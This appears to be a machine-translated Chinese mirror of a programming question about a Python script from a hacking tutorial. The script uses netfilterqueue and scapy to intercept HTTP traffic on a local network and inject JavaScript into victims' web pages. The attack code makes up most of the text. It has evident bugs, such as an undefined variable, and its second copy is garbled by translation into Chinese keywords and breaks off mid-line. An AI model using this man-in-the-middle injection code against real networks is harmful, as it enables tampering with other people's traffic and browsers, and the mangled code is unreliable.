python黑客攻击iptables输出链错误

python黑客攻击iptables输出链错误,python,input,network-programming,output,iptables,Python,Input,Network Programming,Output,Iptables,下面的python代码与我的教程(zsecurity)完全相同 除了在我的电脑中,代码对其他所有人都正常工作 这是在同一网络中修改网页(http)目标计算机的代码 import netfilterqueue import scapy.all as scapy import re def set_load(packet,load): packet[scapy.Raw].load = load del packet[scapy.IP].len del packet[scap

下面的python代码与我的教程(zsecurity)完全相同

除了在我的电脑中,代码对其他所有人都正常工作 这是在同一网络中修改网页(http)目标计算机的代码

import netfilterqueue
import scapy.all as scapy
import re

def set_load(packet,load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum

def proccesed_pockets(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy.Raw in scapy_packet and scapy.TCP in scapy_packet:
        load=scapy_packet[scapy.Raw].load
        if scapy_packet[scapy.TCP].dport == 80:
                print(" REQUEST")
                load= re.sub("Accept-Encoding:.*?\\r\\n","",load)

        elif scapy_packet[scapy.TCP].sport == 80:
            print("RESPONSE")
            #injection_code= "<script><alert>any</alert></script>"

            load= load.replace("</body","<script>alert('test');</script></body>")
            content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
            if content_length_search and "text/html" in load:
                content_length = content_length_search.group(1)
                new_content_length = int(content_length) + len (injection_code)
                load= load.replace(content_length, str(new_content_length))


        if load !=   scapy_packet[scapy.Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet))


    packet.accept()
queue=netfilterqueue.NetfilterQueue()
queue.bind(0,proccesed_pockets)
queue
导入netfilterqueue
导入scapy.all as scapy
进口稀土
def设置_加载(数据包,加载):
数据包[scapy.Raw].load=load
del数据包[scapy.IP].len
del数据包[scapy.IP].chksum
del数据包[scapy.TCP].chksum
def加工袋(包装):
scapy\u packet=scapy.IP(packet.get\u payload())
如果scapy_数据包中的scapy.Raw和scapy_数据包中的scapy.TCP:
load=scapy\u数据包[scapy.Raw].load
如果scapy_数据包[scapy.TCP].dport==80:
打印(“请求”)
load=re.sub(“接受编码:.*?\\r\\n”,“加载”)
elif scapy_数据包[scapy.TCP].sport==80:
打印(“回复”)
#注入_代码=”